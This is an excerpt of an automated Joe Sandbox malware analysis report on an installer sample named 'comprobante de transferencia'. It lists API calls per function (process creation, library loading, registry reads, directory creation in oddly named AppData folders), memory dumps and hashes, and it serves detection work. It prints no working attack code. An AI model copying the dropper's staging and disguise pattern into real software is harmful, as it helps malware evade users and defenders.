Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
Opcode Fuzzy Hash: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven
API String ID: 1892508949-828510313
Opcode ID: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
Opcode Fuzzy Hash: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E

Uniqueness

Uniqueness Score: -1.00%

Function 004056FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
CloseHandle.KERNEL32(?), ref: 00405730

Strings

Error launching installer, xrefs: 0040570D

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406B17 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406D18 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406533 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406981 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9F Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004069EB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE

Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FFF
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
Instruction ID: c18903b5dbc92386bcc0ded8fd0819d4ecd3504ae344b6f49c713324e9d388be
Opcode Fuzzy Hash: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
Instruction Fuzzy Hash: 8F219831904219EACF20AFA5CE48A9E7E71AF00354F60427BF511B51E1C7BD8E41DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000690,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
Instruction ID: e4ac8c9376200f70c7981abe7f64d2c812767dcd2539a2364c5f8151efcc43ed
Opcode Fuzzy Hash: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
Instruction Fuzzy Hash: 75117331915205EBDB14CFA4DA489BEB7B4FF44354F20843FE405B72D0D6B89A41EB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

